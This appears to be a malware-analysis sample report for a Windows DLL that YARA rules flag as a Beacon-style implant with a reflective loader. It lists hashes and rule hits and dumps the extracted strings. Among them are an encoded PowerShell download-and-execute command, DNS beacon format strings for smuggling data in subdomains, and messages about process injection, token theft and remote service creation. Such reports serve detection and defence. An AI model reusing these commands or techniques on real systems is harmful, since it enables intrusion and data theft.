Sample details: 4c8471847ccd4d26e841ce03ecd21348 --

Hashes
MD5: 4c8471847ccd4d26e841ce03ecd21348
SHA1: c38657fc0702eb24b7b3568c431387d2a3408dae
SHA256: 1b98e9ee92f90530743c0e79b9d9d1630c4e43b1241caf8bd13a27f6694f9777
SSDEEP: 3072:ZZrNm0q1UmGTUVjsY9vsVfYLVthu1aYYp1V92R1n6/0IU1Danu6BR:ZqV+KDCVfenh+Qfg2/0Van1
Details
File Type: MS-DOS
Added: 2019-01-21 21:02:47
Yara Hits
YRP/Visual_Cpp_2005_DLL_Microsoft | YRP/Visual_Cpp_2003_DLL_Microsoft | YRP/IsPE32 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasModified_DOS_Message | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/escalate_priv | YRP/win_registry | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/VC8_Random | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader | FlorianRoth/ReflectiveLoader | FlorianRoth/Beacon_K5om |
Strings
		f7m>&7
%Z? 2:{
D$PSVW
QQSVW3
SWjD_W
tSVWjD^V3
pVWjD^V
0VVVVV
QSVWj$Z
 SVWj@^V
tcj@ShI
tzHteHt3Hu
tDHt(HuV
PSSSSSSh 
YYSSPh
8<+tz<-tz
D$,PSP
0SSSSS
PRSVWj
YY_^[ZX
HHtXHHt
>If90t
HHtYHHt
<at9<rt,<wt
URPQQhX
j@j ^V
0WWWWW
>=Yt1j
< tK<	tG
0SSSSS
0SSSSS
0SSSSS
0A@@Ju
^SSSSS
j"^SSSSS
v	N+D$
tGHt.Ht&
^SSSSS
8VVVVV
;t$,v-
UQPXY]Y[
t"SS9]
PPPPPPPP
PPPPPPPP
t+WWVPV
u8VVVVj
0WWWWW
AAFFf;
>=Yt1j
rijndael
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
,cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
}}}}cc
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
"3DUfw
"3DUfw
"3DUfw
CorExitProcess
runtime error 
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program: 
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
ADVAPI32.DLL
`h`hhh
xppwpp
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corrupted
A local variable was used before it was initialized
Stack memory was corrupted
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
Run-Time Check Failure #%d - %s
Unknown Module Name
Unknown Filename
Stack corrupted near unknown variable
Stack around _alloca corrupted
Local variable used before initialization
Stack memory corruption
Cast to smaller type causing loss of data
Stack pointer corruption
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
MSPDB80.DLL
EnvironmentDirectory
SOFTWARE\Microsoft\VisualStudio\9.0\Setup\VS
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
PDBOpenValidate5
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CONOUT$
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
%s as %s\%s: %d
127.0.0.1
%s on %s: %d
Started service %s on %s
IsWow64Process
kernel32
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
syswow64
system32
NtQueueApcThread
process
%d	%d	%s
Kerberos
%d	%d	%d.%d	%s	%s	%s	%d	%d
?%s=%s
%s&%s=%s
%s%s: %s
%s	%d	%d
%s	%d	%d	%s	%s	%d
%-24s 
sha256
abcdefghijklmnop
?456789:;<=
 !"#$%&'()*+,-./0123
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
Could not open process token: %d (%u)
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
Could not open '%s'
copy failed: %d
move failed: %d
ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not adjust permissions in process: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
Could not set PPID to %d: %d
Could not set PPID to %d
Could not connect to pipe: %d
%d	%d	%s
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
%s%s: %s
Could not kill %d: %d
could not create pipe: %d
I'm already in SMB mode
Could not open process: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
b\bz>8
tkj|L+;u
+w7"[l
`iqnhu
%s (admin)
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
Microsoft Base Cryptographic Provider v1.0
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
_ReflectiveLoader@4
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ihihikikikihikx5ijikimiiNyimikimiyiiilihikiiioihikiiinijhiY
dhhhlij
kjhihiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiaijhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii`iji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiciji)iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibijhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiieijhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiidijhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiitiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiwiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiifiji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivihikiiiyihikiiixihikiii{ihikiiiMihikihiLikimiiihiOihikiiii
D$$[[aYZQ
6QQh8h
AQAPRQVH1
AXAX^YZAXAYAZH
2$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4
6K7a7s7
7.8e8q8
8/969a9
:":,:::A:U:b:g:m:O;f;
0:0@0H0{0
1,111I1T1x1
182>2t2{2
546?6T6^6n6|6
6/7a7w7
8L8V8e8{8
9V9h9w9
:N;a;l;x;
=#=2=]>g>
1A1K1\1e1
6*6U6g6|6
7"707M7S7]7c7l7x7
7&8A8W8a8x8
989N9[9j9
:#:L:q:x:
:9;Z;u;
2S2}2w3
6.7A7m7
9#9Q9[9
0J0Q0c0i0
0G1T1h1t1
3<3S3`3
474\4f4
0M0U0q0
1'1.191O1
293c3w3
414B4a4f4
5 505u5
8;93:P:
=%>>>J>`>|>
3Y3O4m4
5N7X7b7=8L8V8i8
8Q9f9w9
:';c;x;
5$6>6b6i6
:D:\:m:v:{:
;+<D<n<
=J=[=s=~=
>">(>2>C>T>
?!?'?5?;?A?H?^?m?
0!0'0=0F0L0W0]0h0n0u0
021L1y1
1.2H2z2
5"5<5D5U5c5k5s5{5
929j9s9x9
;";(;5;G;q;
;=<T<n<
=0=8=?=
7"7&7*7.72767:7>7B7F7J7N7R7V768N8
8K9s9y9
;+;F;R;w;
;%<><i<
=%=?=K=n=|=
0?1I1_1o1}1q2
= =$=(=,=0=4=8=<=G=
3O5V5f5q5
6,636C6N6#7*757E7
8	9+929B9M9o9v9
:':2:S:Z:j:u:
:$;+;;;F;
;,<3<C<N<
?"?D?K?[?f?
0(0/0?0J0l0s0
122H2_2r2
60767G7]7o7
8-8]:W;`;
;?<G<Z<e<j<z<
=#=K=U={=
>(>/>7><>@>D>m>
?$?(?,?0?
0M0T0X0\0`0d0h0l0p0
1!292A2G2
4G4c4i4
7$7(7,7074787<7@7
>!>%>)>->1>5>9>=>A>E>I>M>Q>U>Y>]>a>
0F1L1R1X1^1d1k1r1y1
232:2M2i2
3,363B3K3S3]3c3i3v3}3
4"4+4>4b4
5%5*5m7{7
878=8H8M8U8[8e8l8
0R0,141L1d1
222=2a2j2q2z2
313D3\3n3
6&7D7j7
3/363N3u3{3
4"4)4=4D4\4h4n4z4
5#5F5[5
8%8,82898?8G8N8S8[8d8p8u8z8
9=9C9_9
:!:J:O:f:
<\=b={=
=Q>V>[>`>p>
>>?C?J?O?V?[?
1B2V2|2
?2?A?N?Z?j?q?
"0U0d0m0
424:4Y4i4{4
6D7d7T8}8
?2?=?`?
0C0M0e0
:%:w:}:
:.;;;T;r;
;G=]=a>n>
2@384A4M4
4$5-595Q5`5
1%1+1;1@1X1^1m1s1
7-7g7t7~7
:	;";>;G;M;V;[;j;
2	2=2H2k2/3<3#4D4P4w4
6;7N7j7|7
2(232H2O2U2k2
6	6I6[6
6$7,7j7
92:8:D:
;	<+<S<
4$517C7U7w7
<&=C=o=
7P7`7#8)858D8x8
98;>;D;J;P;V;\;b;h;n;t;z;
L0R0^0g0z0
2)242@2S2
6&717;7L7W7f7
3 484<4@4D4H4L4
8`:d:h:l:p:
5 5$5(5,5054585<5@5D5H5L5P5T5l5p5t5|5
: :@:\:`:
;,;0;P;l;p;
<4<8<X<x<
=8=X=x=
> >@>`>
3$3,343<3D3L3T3\3d3l3p3t3
< =0=@=P=`=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>